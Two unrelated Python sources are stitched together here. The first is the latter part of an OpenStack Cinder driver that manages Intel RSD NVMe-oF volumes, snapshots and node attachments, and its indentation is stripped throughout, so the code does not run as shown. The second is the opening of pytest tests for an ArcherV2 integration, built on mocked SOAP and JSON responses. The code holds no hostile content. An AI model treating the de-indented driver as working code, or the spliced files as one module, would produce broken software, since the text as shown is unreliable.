return cls(rsdlib)
def _get_storage(self, storage_url):
ss_url = "/".join(storage_url.split("/", 5)[:5])
storage_service = self.rsdlib.get_storage_service(ss_url)
return storage_service
def _get_storages(self, filter_nvme=True):
ret = []
for storage in (self.rsdlib
.get_storage_service_collection().get_members()):
if filter_nvme:
drives = storage.drives.get_members()
if drives and any('nvme' in drive.protocol.lower()
                  for drive in drives if drive.protocol):
ret.append(storage)
else:
ret.append(storage)
return ret
def _get_node(self, node_url):
return self.rsdlib.get_node(node_url)
def _get_volume(self, volume_url):
ss = self._get_storage(volume_url)
volume = ss.volumes.get_member(volume_url)
return volume
def _get_providing_pool(self, volume):
len_cs = len(volume.capacity_sources)
if len_cs != 1:
raise exception.ValidationError(
detail=(_("Volume %(vol)s has %(len_cs)d capacity_sources!")
% {'vol': volume.path,
'len_cs': len_cs}))
len_pp = len(volume.capacity_sources[0].providing_pools)
if len_pp != 1:
raise exception.ValidationError(
detail=(_("Volume %(vol)s has %(len_pp)d providing_pools!")
% {'vol': volume.path,
'len_pp': len_pp}))
providing_pool = volume.capacity_sources[0].providing_pools[0]
return providing_pool.get_members()[0].path
def _create_vol_or_snap(self,
storage,
size_in_bytes,
pool_url=None,
source_snap=None,
source_vol=None):
capacity_sources = None
if pool_url:
capacity_sources = [{
"ProvidingPools": [{
"@odata.id": pool_url
}]
}]
replica_infos = None
if source_snap:
replica_infos = [{
"ReplicaType": "Clone",
"Replica": {"@odata.id": source_snap}
}]
if source_vol:
raise exception.InvalidInput(
reason=(_("Cannot specify both source_snap=%(snap)s and "
"source_vol=%(vol)s!")
% {'snap': source_snap,
'vol': source_vol}))
elif source_vol:
replica_infos = [{
"ReplicaType": "Snapshot",
"Replica": {"@odata.id": source_vol}
}]
LOG.debug("Creating... with size_byte=%s, "
"capacity_sources=%s, replica_infos=%s",
size_in_bytes, capacity_sources, replica_infos)
volume_url = storage.volumes.create_volume(
size_in_bytes,
capacity_sources=capacity_sources,
replica_infos=replica_infos)
LOG.debug("Created volume_url=%s", volume_url)
return volume_url
def create_volume(self, size_in_gb):
size_in_bytes = size_in_gb * units.Gi
try:
for storage in self._get_storages():
try:
volume_url = self._create_vol_or_snap(
storage, size_in_bytes)
LOG.info("RSD volume %s created, with size %s GiB",
volume_url, size_in_gb)
return volume_url
# NOTE(Yingxin): Currently, we capture sushy_exception to
# identify that volume creation failed at the RSD backend.
except (sushy_exceptions.HTTPError,
sushy_exceptions.ConnectionError) as e:
LOG.warning("skipped storage %s for creation error %s",
storage.path, e)
except Exception:
LOG.exception("Create volume failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create new volume with %d GiB') % size_in_gb))
def create_snap(self, volume_url):
try:
ss = self._get_storage(volume_url)
volume = self._get_volume(volume_url)
pool_url = self._get_providing_pool(volume)
snap_url = self._create_vol_or_snap(
ss, volume.capacity_bytes,
pool_url=pool_url,
source_vol=volume_url)
LOG.info("RSD snapshot %s created, from volume %s",
snap_url, volume_url)
return snap_url
except Exception:
LOG.exception("Create snapshot failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create snapshot from volume %s')
% volume_url))
def create_volume_from_snap(self, snap_url, size_in_gb=None):
try:
ss = self._get_storage(snap_url)
snap = self._get_volume(snap_url)
if not size_in_gb:
size_in_bytes = snap.capacity_bytes
else:
size_in_bytes = size_in_gb * units.Gi
pool_url = self._get_providing_pool(snap)
volume_url = self._create_vol_or_snap(
ss, size_in_bytes,
pool_url=pool_url,
source_snap=snap_url)
LOG.info("RSD volume %s created, from snap %s, "
"with size %s GiB.",
volume_url, snap_url,
size_in_bytes / units.Gi)
return volume_url
except Exception:
LOG.exception("Create volume from snapshot failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create volume from snapshot %s')
% snap_url))
def clone_volume(self, volume_url, size_in_gb=None):
try:
ss = self._get_storage(volume_url)
origin_volume = self._get_volume(volume_url)
pool_url = self._get_providing_pool(origin_volume)
snap_url = self._create_vol_or_snap(
ss, origin_volume.capacity_bytes,
pool_url=pool_url,
source_vol=volume_url)
except Exception:
LOG.exception("Clone volume failed (create snapshot phase)")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create volume from volume %s, snapshot '
'creation failed.')
% volume_url))
try:
if not size_in_gb:
size_in_bytes = origin_volume.capacity_bytes
else:
size_in_bytes = size_in_gb * units.Gi
new_vol_url = self._create_vol_or_snap(
ss, size_in_bytes,
pool_url=pool_url,
source_snap=snap_url)
LOG.info("RSD volume %s created, from volume %s and snap %s, "
"with size %s GiB.",
new_vol_url, volume_url, snap_url,
size_in_bytes / units.Gi)
return new_vol_url, snap_url
except Exception:
LOG.exception("Clone volume failed (clone volume phase)")
try:
self.delete_vol_or_snap(snap_url)
except Exception:
LOG.exception("Clone volume failed (undo snapshot)")
raise exception.VolumeBackendAPIException(
data=(_('Unable to delete the temp snapshot %(snap)s, '
'during a failure to clone volume %(vol)s.')
% {'snap': snap_url,
'vol': volume_url}))
raise exception.VolumeBackendAPIException(
data=(_('Unable to create volume from volume %s, volume '
'creation failed.')
% volume_url))
def extend_volume(self, volume_url, size_in_gb):
size_in_bytes = size_in_gb * units.Gi
try:
volume = self._get_volume(volume_url)
volume.resize(size_in_bytes)
LOG.info("RSD volume %s resized to %s Bytes",
volume.path, size_in_bytes)
except Exception:
LOG.exception("Extend volume failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to extend volume %s.') % volume_url))
def delete_vol_or_snap(self, volume_url,
volume_name='', ignore_non_exist=False):
try:
try:
volume = self._get_volume(volume_url)
except sushy_exceptions.ResourceNotFoundError:
if ignore_non_exist:
LOG.warning("Deleted non existent vol/snap %s", volume_url)
else:
raise
if volume.links.endpoints:
LOG.warning("Delete vol/snap failed, attached: %s", volume_url)
raise exception.VolumeIsBusy(_("Volume is already attached"),
volume_name=volume_name)
volume.delete()
except sushy_exceptions.BadRequestError as e:
try:
msg = e.body['@Message.ExtendedInfo'][0]['Message']
if (msg == "Cannot delete source snapshot volume when "
"other clone volumes are based on this snapshot."):
LOG.warning("Delete vol/snap failed, has-deps: %s",
volume_url)
raise exception.SnapshotIsBusy(snapshot_name=volume_name)
except Exception:
LOG.exception("Delete vol/snap failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to delete volume %s.') % volume_url))
except Exception:
LOG.exception("Delete vol/snap failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to delete volume %s.') % volume_url))
LOG.info("RSD volume deleted: %s", volume_url)
def get_node_url_by_uuid(self, uuid):
uuid = uuid.upper()
try:
nodes = self.rsdlib.get_node_collection().get_members()
for node in nodes:
node_system = None
if node:
node_system = self.rsdlib.get_system(
node.links.computer_system)
if (node and
node_system and
node_system.uuid and
node_system.uuid.upper() == uuid):
return node.path
except Exception:
LOG.exception("Get node url failed")
return ""
def get_stats(self):
free_capacity_gb = 0
total_capacity_gb = 0
allocated_capacity_gb = 0
total_volumes = 0
try:
storages = self._get_storages()
for storage in storages:
for pool in storage.storage_pools.get_members():
total_capacity_gb += (
float(pool.capacity.allocated_bytes or 0) / units.Gi)
allocated_capacity_gb += (
float(pool.capacity.consumed_bytes or 0) / units.Gi)
total_volumes += len(storage.volumes.members_identities)
free_capacity_gb = total_capacity_gb - allocated_capacity_gb
LOG.info("Got RSD stats: free_gb:%s, total_gb:%s, "
"allocated_gb:%s, volumes:%s",
free_capacity_gb,
total_capacity_gb,
allocated_capacity_gb,
total_volumes)
except Exception:
LOG.exception("Get stats failed")
return (free_capacity_gb,
total_capacity_gb,
allocated_capacity_gb,
total_volumes)
def _get_nqn_endpoints(self, endpoint_urls):
ret = []
for endpoint_url in endpoint_urls:
endpoint_json = (
json.loads(self.rsdlib._conn.get(endpoint_url).text))
for ident in endpoint_json["Identifiers"]:
if ident["DurableNameFormat"] == "NQN":
nqn = ident["DurableName"]
ret.append((nqn, endpoint_json))
break
return ret
@utils.retry(RSDRetryableException,
interval=4,
retries=5,
backoff_rate=2)
def attach_volume_to_node(self, volume_url, node_url):
LOG.info('Trying attach from node %s to volume %s',
node_url, volume_url)
try:
volume = self._get_volume(volume_url)
node = self._get_node(node_url)
if len(volume.links.endpoints) > 0:
raise exception.ValidationError(
detail=(_("Volume %s already attached") % volume_url))
node.attach_endpoint(volume.path)
except sushy_exceptions.InvalidParameterValueError:
LOG.exception("Attach volume failed (not allowable)")
raise RSDRetryableException(
reason=(_("Not allowed to attach from "
"%(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
except Exception:
LOG.exception("Attach volume failed (attach phase)")
raise exception.VolumeBackendAPIException(
data=(_("Attach failed from %(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
try:
volume.refresh()
node.refresh()
v_endpoints = volume.links.endpoints
v_endpoints = self._get_nqn_endpoints(v_endpoints)
if len(v_endpoints) != 1:
raise exception.ValidationError(
detail=(_("Attach volume error: %d target nqns")
% len(v_endpoints)))
target_nqn, v_endpoint = v_endpoints[0]
ip_transports = v_endpoint["IPTransportDetails"]
if len(ip_transports) != 1:
raise exception.ValidationError(
detail=(_("Attach volume error: %d target ips")
% len(ip_transports)))
ip_transport = ip_transports[0]
target_ip = ip_transport["IPv4Address"]["Address"]
target_port = ip_transport["Port"]
node_system = self.rsdlib.get_system(node.links.computer_system)
n_endpoints = tuple(
val["@odata.id"]
for val in node_system.json["Links"]["Endpoints"])
n_endpoints = self._get_nqn_endpoints(n_endpoints)
if len(n_endpoints) == 0:
raise exception.ValidationError(
detail=(_("Attach volume error: %d host nqns")
% len(n_endpoints)))
host_nqn, v_endpoint = n_endpoints[0]
LOG.info('Attachment successful: Retrieved target IP %s, '
'target Port %s, target NQN %s and initiator NQN %s',
target_ip, target_port, target_nqn, host_nqn)
return (target_ip, target_port, target_nqn, host_nqn)
except Exception as e:
LOG.exception("Attach volume failed (post-attach)")
try:
node.refresh()
node.detach_endpoint(volume.path)
LOG.info('Detached from node %s to volume %s',
node_url, volume_url)
except Exception:
LOG.exception("Attach volume failed (undo attach)")
raise exception.VolumeBackendAPIException(
data=(_("Undo-attach failed from %(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
if isinstance(e, exception.ValidationError):
raise RSDRetryableException(
reason=(_("Validation error during post-attach from "
"%(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
else:
raise exception.VolumeBackendAPIException(
data=(_("Post-attach failed from %(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
def detach_volume_from_node(self, volume_url, node_url):
LOG.info('Trying detach from node %s for volume %s',
node_url, volume_url)
try:
volume = self._get_volume(volume_url)
node = self._get_node(node_url)
node.detach_endpoint(volume.path)
except Exception:
LOG.exception("Detach volume failed")
raise exception.VolumeBackendAPIException(
data=(_("Detach failed from %(node)s for %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
def detach_all_node_connections_for_volume(self, volume_url):
try:
volume = self._get_volume(volume_url)
nodes = self.rsdlib.get_node_collection().get_members()
for node in nodes:
if node:
if volume.path in node.get_allowed_detach_endpoints():
node.detach_endpoint(volume.path)
except Exception:
LOG.exception("Detach failed for volume from all host "
"connections")
raise exception.VolumeBackendAPIException(
data=(_("Detach failed for %(volume)s from all host "
"connections.")
% {'volume': volume_url}))
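# Hedged sketch (illustration only, with hypothetical resource paths): the
# payloads _create_vol_or_snap builds for a clone pin the providing pool via
# capacity_sources and reference the source snapshot via replica_infos:
def _example_clone_payload(pool_url, snap_url):
    capacity_sources = [{"ProvidingPools": [{"@odata.id": pool_url}]}]
    replica_infos = [{"ReplicaType": "Clone",
                      "Replica": {"@odata.id": snap_url}}]
    return capacity_sources, replica_infos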
@interface.volumedriver
class RSDDriver(driver.VolumeDriver):
"""Openstack driver to perform NVMe-oF volume management in RSD Solution
.. code-block:: none
Version History:
1.0.0: Initial driver
"""
VERSION = '1.0.0'
CI_WIKI_NAME = 'INTEL-RSD-CI'
def __init__(self, *args, **kwargs):
super(RSDDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(RSD_OPTS)
self.rsdClient = None
@staticmethod
def get_driver_options():
return RSD_OPTS
@volume_utils.trace
def do_setup(self, context):
self.rsdClient = RSDClient.initialize(
self.configuration.podm_url,
self.configuration.podm_username,
self.configuration.podm_password,
self.configuration.suppress_requests_ssl_warnings)
def check_for_setup_error(self):
pass
@volume_utils.trace
def create_volume(self, volume):
size_in_gb = int(volume['size'])
volume_url = self.rsdClient.create_volume(size_in_gb)
return {'provider_location': volume_url}
@volume_utils.trace
def delete_volume(self, volume):
volume_url = volume['provider_location']
if not volume_url:
return
self.rsdClient.delete_vol_or_snap(volume_url,
volume_name=volume.name,
ignore_non_exist=True)
provider_snap_url = volume.metadata.get("rsd_provider_snap")
if provider_snap_url:
self.rsdClient.delete_vol_or_snap(provider_snap_url,
volume_name=volume.name,
ignore_non_exist=True)
@volume_utils.trace
def _update_volume_stats(self):
backend_name = (
self.configuration.safe_get('volume_backend_name') or 'RSD')
ret = self.rsdClient.get_stats()
(free_capacity_gb,
total_capacity_gb,
allocated_capacity_gb,
total_volumes) = ret
spool = {}
spool['pool_name'] = backend_name
spool['total_capacity_gb'] = total_capacity_gb
spool['free_capacity_gb'] = free_capacity_gb
spool['allocated_capacity_gb'] = allocated_capacity_gb
spool['thin_provisioning_support'] = True
spool['thick_provisioning_support'] = True
spool['multiattach'] = False
self._stats['volume_backend_name'] = backend_name
self._stats['vendor_name'] = 'Intel'
self._stats['driver_version'] = self.VERSION
self._stats['storage_protocol'] = 'nvmeof'
# SinglePool
self._stats['pools'] = [spool]
@volume_utils.trace
def initialize_connection(self, volume, connector, **kwargs):
uuid = connector.get("system uuid")
if not uuid:
msg = _("initialize_connection error: no uuid available!")
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
node_url = self.rsdClient.get_node_url_by_uuid(uuid)
if not node_url:
msg = (_("initialize_connection error: no node_url from uuid %s!")
% uuid)
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
volume_url = volume['provider_location']
target_ip, target_port, target_nqn, initiator_nqn = (
self.rsdClient.attach_volume_to_node(volume_url, node_url))
conn_info = {
'driver_volume_type': 'nvmeof',
'data': {
'transport_type': 'rdma',
'host_nqn': initiator_nqn,
'nqn': target_nqn,
'target_port': target_port,
'target_portal': target_ip,
}
}
return conn_info
@volume_utils.trace
def terminate_connection(self, volume, connector, **kwargs):
if connector is None:
# None connector means force-detach
volume_url = volume['provider_location']
self.rsdClient.detach_all_node_connections_for_volume(volume_url)
return
uuid = connector.get("system uuid")
if not uuid:
msg = _("terminate_connection error: no uuid available!")
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
node_url = self.rsdClient.get_node_url_by_uuid(uuid)
if not node_url:
msg = (_("terminate_connection error: no node_url from uuid %s!")
% uuid)
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
volume_url = volume['provider_location']
self.rsdClient.detach_volume_from_node(volume_url, node_url)
def ensure_export(self, context, volume):
pass
def create_export(self, context, volume, connector):
pass
def remove_export(self, context, volume):
pass
@volume_utils.trace
def create_volume_from_snapshot(self, volume, snapshot):
snap_url = snapshot.provider_location
old_size_in_gb = snapshot.volume_size
size_in_gb = volume.size
volume_url = self.rsdClient.create_volume_from_snap(snap_url)
if size_in_gb != old_size_in_gb:
try:
self.rsdClient.extend_volume(volume_url, size_in_gb)
except Exception:
self.rsdClient.delete_vol_or_snap(volume_url,
volume_name=volume.name)
raise
return {'provider_location': volume_url}
@volume_utils.trace
def create_snapshot(self, snapshot):
volume_url = snapshot.volume.provider_location
snap_url = self.rsdClient.create_snap(volume_url)
snapshot.provider_location = snap_url
snapshot.save()
@volume_utils.trace
def delete_snapshot(self, snapshot):
snap_url = snapshot.provider_location
if not snap_url:
return
self.rsdClient.delete_vol_or_snap(snap_url,
volume_name=snapshot.name,
ignore_non_exist=True)
@volume_utils.trace
def extend_volume(self, volume, new_size):
volume_url = volume.provider_location
self.rsdClient.extend_volume(volume_url, new_size)
def clone_image(self, context, volume,
image_location, image_meta,
image_service):
return None, False
@volume_utils.trace
def create_cloned_volume(self, volume, src_vref):
volume_url = src_vref.provider_location
old_size_in_gb = src_vref.size
size_in_gb = volume.size
new_vol_url, provider_snap_url = self.rsdClient.clone_volume(
volume_url)
metadata = get_volume_metadata(volume)
metadata["rsd_provider_snap"] = provider_snap_url
if size_in_gb != old_size_in_gb:
try:
self.rsdClient.extend_volume(new_vol_url, size_in_gb)
except Exception:
self.rsdClient.delete_vol_or_snap(new_vol_url,
volume_name=volume.name)
self.rsdClient.delete_vol_or_snap(provider_snap_url,
volume_name=volume.name)
raise
return {'provider_location': new_vol_url,
'metadata': metadata}
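# Hedged note (illustration only): initialize_connection above returns NVMe-oF
# connection properties shaped like the following; every value here is
# hypothetical:
def _example_conn_info():
    return {
        'driver_volume_type': 'nvmeof',
        'data': {
            'transport_type': 'rdma',
            'host_nqn': 'nqn.2014-08.org.nvmexpress:uuid:example-host',
            'nqn': 'nqn.2014-08.org.nvmexpress:uuid:example-target',
            'target_port': 4420,
            'target_portal': '10.0.0.10',
        }
    }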
|
|
import copy
from datetime import datetime, timezone
import pytest
from CommonServerPython import DemistoException
import demistomock as demisto
from ArcherV2 import Client, extract_from_xml, generate_field_contents, get_errors_from_res, generate_field_value, \
fetch_incidents, get_fetch_time, parser, OCCURRED_FORMAT, search_records_by_report_command, search_records_soap_request
BASE_URL = 'https://test.com/'
GET_TOKEN_SOAP = '<?xml version="1.0" encoding="utf-8"?>' + \
'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"' \
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \
' xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body>' + \
' <CreateUserSessionFromInstanceResponse xmlns="http://archer-tech.com/webservices/">' + \
' <CreateUserSessionFromInstanceResult>TOKEN</CreateUserSessionFromInstanceResult>' + \
' </CreateUserSessionFromInstanceResponse>' + \
' </soap:Body>' + \
'</soap:Envelope>'
XML_FOR_TEST = '<?xml version="1.0" encoding="utf-8"?>' + \
'<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
' <soap:Body>' + \
' <GetValueListForField xmlns="http://archer-tech.com/webservices/">' + \
' <fieldId>6969</fieldId>' + \
' </GetValueListForField>' + \
' </soap:Body>' + \
'</soap:Envelope>'
GET_LEVEL_RES = [{"IsSuccessful": True, "RequestedObject": {"Id": 123}}]
FIELD_DEFINITION_RES = [
{
"IsSuccessful": True,
"RequestedObject": {
"Id": 1, "Type": 7, "Name": "External Links", "IsRequired": False
}
},
{
"IsSuccessful": True,
"RequestedObject": {
"Id": 2, "Type": 1, "Name": "Device Name", "IsRequired": True, "RelatedValuesListId": 8
}
}
]
GET_LEVELS_BY_APP = {
'level': 123, 'mapping': {'1': {
'Type': 7, 'Name': 'External Links', 'FieldId': "1", 'IsRequired': False, 'RelatedValuesListId': None},
'2': {
'Type': 1, 'Name': 'Device Name', 'FieldId': "2",
'IsRequired': True, 'RelatedValuesListId': 8}
}}
GET_FIElD_DEFINITION_RES = {
"RequestedObject": {"RelatedValuesListId": 62, "Type": 4},
"IsSuccessful": True,
"ValidationMessages": []
}
VALUE_LIST_RES = {
"RequestedObject": {
"Children": [
{"Data": {"Id": 471, "Name": "Low", "IsSelectable": True}},
{"Data": {"Id": 472, "Name": "Medium", "IsSelectable": True}},
{"Data": {"Id": 473, "Name": "High", "IsSelectable": True}}]},
"IsSuccessful": True, "ValidationMessages": []
}
VALUE_LIST_RES_FOR_SOURCE = {
"RequestedObject": {
"Children": [
{"Data": {"Id": 471, "Name": "ArcSight", "IsSelectable": True}},
{"Data": {"Id": 472, "Name": "Medium", "IsSelectable": True}},
{"Data": {"Id": 473, "Name": "High", "IsSelectable": True}}]},
"IsSuccessful": True, "ValidationMessages": []
}
VALUE_LIST_FIELD_DATA = {
"FieldId": 304, "ValuesList": [
{"Id": 471, "Name": "Low", "IsSelectable": True},
{"Id": 472, "Name": "Medium", "IsSelectable": True},
{"Id": 473, "Name": "High", "IsSelectable": True}]}
RES_WITH_ERRORS = {
'ValidationMessages': [
{'ResourcedMessage': 'The Type field is a required field.'},
{'ResourcedMessage': 'The Device Name field is a required field.'}]
}
GET_RECORD_RES_failed = {'ValidationMessages': [{'ResourcedMessage': 'No resource found.'}]}
GET_RECORD_RES_SUCCESS = \
{
"Links": [],
"RequestedObject": {
"Id": 1010,
"LevelId": 123,
"FieldContents": {
"2": {
"Type": 1,
"Value": "The device name",
"FieldId": 2
}
}
},
"IsSuccessful": True,
"ValidationMessages": []
}
INCIDENT_RECORD = {
"record": {
"Id": "227602",
"Status": "New",
"Name": "Incident 01",
"Date/Time Reported": "2018-03-26T10:03:32.243Z"
},
"raw": {
"@contentId": "227602",
"@levelId": "67",
"@levelGuid": "b0c2d9a1-167c-4fee-ad91-4b4e7b098b4b",
"@moduleId": "75",
"@parentId": "0",
"Field": [
{
"@id": "302",
"@guid": "3ec0f462-4c17-4036-b0fa-2f04f3aba3d0",
"@type": "4",
"ListValues": {
"ListValue": {
"@id": "466",
"@displayName": "New",
"#text": "New"
}
}
},
{
"@id": "305",
"@guid": "9c5e3de1-299b-430f-998a-185ad86e2e79",
"@type": "3",
"@xmlConvertedValue": "2018-03-26T10:03:32.243Z",
"#text": "26/03/2018 06:03:32"
}
]
}
}
INCIDENT_RECORD_US_TZ = {
"record": {
"Id": "227603",
"Title": "Test",
"created date": "2/25/2021 8:45:55 AM"
},
"raw": {
"@contentId": "227603",
"@levelId": "67",
"@levelGuid": "b0c2d9a1-167c-4fee-ad91-4b4e7b098b4b",
"@moduleId": "75",
"@parentId": "0",
"Field": [
{
"@id": "35339",
"@guid": "9c5e3de1-299b-430f-998a-185ad86e2e79",
"@type": "1",
"#text": "Test"
},
{
"@id": "53075",
"@guid": "9c5e3de1-299b-430f-998a-185ad86e2e80",
"@type": "21",
"@xmlConvertedValue": "2021-02-25T08:45:55.977Z",
"#text": "2/25/2021 8:45:55 AM"
}
]
}
}
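# Hedged sketch (not part of the test data): date/time fields in the raw
# records carry an "@xmlConvertedValue" ISO-8601 timestamp alongside the
# locale-formatted "#text", and the tests assert against the converted value.
# A minimal parse, assuming the millisecond Zulu format shown above:
def _example_parse_converted_value(raw_field):
    return datetime.strptime(raw_field["@xmlConvertedValue"],
                             "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)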
SEARCH_RECORDS_RES = \
'<?xml version="1.0" encoding="utf-8"?>' + \
'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"' \
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">' + \
' <soap:Body>' + \
' <ExecuteSearchResponse xmlns="http://archer-tech.com/webservices/">' + \
' <ExecuteSearchResult>' + \
'<?xml version="1.0" encoding="utf-16"?><Records count="6"><Metadata><' \
'FieldDefinitions><FieldDefinition id="2" name="Device Name" alias="Name_Full" /><' \
'/FieldDefinitions></Metadata><LevelCounts><LevelCount id="37" count="6" /><' \
'/LevelCounts><Record contentId="238756" levelId="37" moduleId="84" parentId="0"><Field id="2" guid=' \
'"9bc24614-2bc7-4849-a3a3-054729854ab4" type="1">DEVICE NAME</Field></Record></Records>' + \
' </ExecuteSearchResult>' + \
' </ExecuteSearchResponse>' + \
' </soap:Body>' + \
'</soap:Envelope>'
GET_RESPONSE_NOT_SUCCESSFUL_JSON = {"IsSuccessful": False, "RequestedObject": None,
"ValidationMessages": [{"Reason": "Validation", "Severity": 3,
"MessageKey": "ValidationMessageTemplates"
":LoginNotValid",
"Description": "",
"Location": -1,
"ErroredValue": None,
"Validator": "ArcherApi."
"Controllers.Security"
"Controller, ArcherApi, "
"Version=6.5.200.1045, "
"Culture=neutral, "
"PublicKeyToken=null",
"XmlData": None,
"ResourcedMessage": None}]}
GET_RESPONSE_SUCCESSFUL_JSON = {"IsSuccessful": True, "RequestedObject": {'SessionToken': 'session-id'}}
SEARCH_RECORDS_BY_REPORT_RES = \
'<Records count="18">' + \
'<Metadata>' + \
' <FieldDefinitions>' + \
' <FieldDefinition id="1580" name="Policy Name" alias="Policy_Name"/>' + \
' <FieldDefinition id="1583" name="Policy Statement"' + \
' alias="Policy_Statement"/>' + \
' </FieldDefinitions>' + \
'</Metadata>' + \
'<LevelCounts>' + \
' <LevelCount id="3" count="18"/>' + \
'</LevelCounts>' + \
'<Record contentId="1720" levelId="3" moduleId="65" parentId="0">' + \
' <Field id="1580" type="1">00.0 Introduction</Field>' + \
' <Field id="1583" type="1">Information' + \
' </Field>' + \
'</Record>' + \
'</Records>'
MOCK_READABLE_SEARCH_RECORDS_BY_REPORT = "### Search records by report results\n|Id|Policy Name|Policy " \
"Statement|\n|---|---|---|\n| 1720 | 00.0 Introduction | Information |\n"
MOCK_RESULTS_SEARCH_RECORDS_BY_REPORT = {
'Records': {'@count': '18', 'Metadata': {'FieldDefinitions': {
'FieldDefinition': [{'@id': '1580', '@name': 'Policy Name', '@alias': 'Policy_Name'},
{'@id': '1583', '@name': 'Policy Statement', '@alias': 'Policy_Statement'}]}},
'LevelCounts': {'LevelCount': {'@id': '3', '@count': '18'}},
'Record': {'@contentId': '1720', '@levelId': '3',
'@moduleId': '65',
'@parentId': '0',
'Field': [{'@id': '1580', '@type': '1',
'#text': '00.0 Introduction'},
{'@id': '1583', '@type': '1',
'#text': "Information"}]}}
}
GET_LEVEL_RES_2 = [
{
"RequestedObject": {
"Type": 1,
"Id": 1580,
"LevelId": 3,
"Name": "Policy Name",
"Alias": "Policy_Name"
},
"IsSuccessful": True
},
{
"RequestedObject": {
"Type": 1,
"Id": 1583,
"LevelId": 3,
"Name": "Policy Statement",
"Alias": "Policy_Statement"
},
"IsSuccessful": True
}
]
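# Hedged illustration (never called by the tests): extract_from_xml resolves a
# dotted path through the parsed SOAP envelope, so the lookup asserted in
# test_extract_from_xml below walks Envelope -> Body -> GetValueListForField
# -> fieldId and yields '6969':
def _example_xml_path():
    return extract_from_xml(XML_FOR_TEST, 'Envelope.Body.GetValueListForField.fieldId')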
class TestArcherV2:
def test_extract_from_xml(self):
field_id = extract_from_xml(XML_FOR_TEST, 'Envelope.Body.GetValueListForField.fieldId')
assert field_id == '6969'
def test_get_level_by_app_id(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/system/level/module/1', json=GET_LEVEL_RES)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/level/123', json=FIELD_DEFINITION_RES)
client = Client(BASE_URL, '', '', '', '', 400)
levels = client.get_level_by_app_id('1')
assert levels == GET_LEVELS_BY_APP
@pytest.mark.parametrize('requested_object, is_successful',
[(GET_RESPONSE_NOT_SUCCESSFUL_JSON, False),
(GET_RESPONSE_SUCCESSFUL_JSON, True)])
def test_update_session(self, mocker, requests_mock, requested_object, is_successful):
requests_mock.post(BASE_URL + 'api/core/security/login', json=requested_object)
mocker.patch.object(demisto, 'results')
client = Client(BASE_URL, '', '', '', '', 400)
if is_successful:
client.update_session()
assert demisto.results.call_count == 0
else:
with pytest.raises(SystemExit) as e:
# in case login wasn't successful, return_error will exit with a reason (for example, LoginNotValid)
# return_error reached
client.update_session()
assert e
def test_update_session_fail_parsing(self, mocker):
"""
Given:
            an exception raised from _http_request after failing to parse a JSON object
        When:
            - initiating a session
        Then:
            - Raise an exception with a message to check the provided URL
"""
mocker.patch.object(Client, '_http_request', side_effect=DemistoException("Failed to parse json object from "
"response: b\"<html><head><script>"
"window.top.location='/Default.aspx';"
"</script></head><body>"
"</body></html>"))
client = Client(BASE_URL, '', '', '', '', 400)
with pytest.raises(DemistoException) as e:
client.update_session()
assert "Check the given URL, it can be a redirect issue" in str(e.value)
def test_generate_field_contents(self):
client = Client(BASE_URL, '', '', '', '', 400)
field = generate_field_contents(client, '{"Device Name":"Macbook"}', GET_LEVELS_BY_APP['mapping'])
assert field == {'2': {'Type': 1, 'Value': 'Macbook', 'FieldId': '2'}}
def test_get_errors_from_res(self):
errors = get_errors_from_res(RES_WITH_ERRORS)
assert errors == 'The Type field is a required field.\nThe Device Name field is a required field.'
def test_get_record_failed(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/content/1010', json=GET_RECORD_RES_failed)
client = Client(BASE_URL, '', '', '', '', 400)
record, res, errors = client.get_record(75, 1010)
assert errors == 'No resource found.'
assert res
assert record == {}
def test_get_record_success(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/content/1010', json=GET_RECORD_RES_SUCCESS)
requests_mock.get(BASE_URL + 'api/core/system/level/module/1', json=GET_LEVEL_RES)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/level/123', json=FIELD_DEFINITION_RES)
client = Client(BASE_URL, '', '', '', '', 400)
record, res, errors = client.get_record(1, 1010)
assert errors is None
assert res
assert record == {'Device Name': 'The device name', 'Id': 1010}
def test_record_to_incident(self):
client = Client(BASE_URL, '', '', '', '', 400)
record = copy.deepcopy(INCIDENT_RECORD)
record['raw']['Field'][1]['@xmlConvertedValue'] = '2018-03-26T10:03:00Z'
incident, incident_created_time = client.record_to_incident(record, 75, '305')
assert incident_created_time == datetime(2018, 3, 26, 10, 3, tzinfo=timezone.utc)
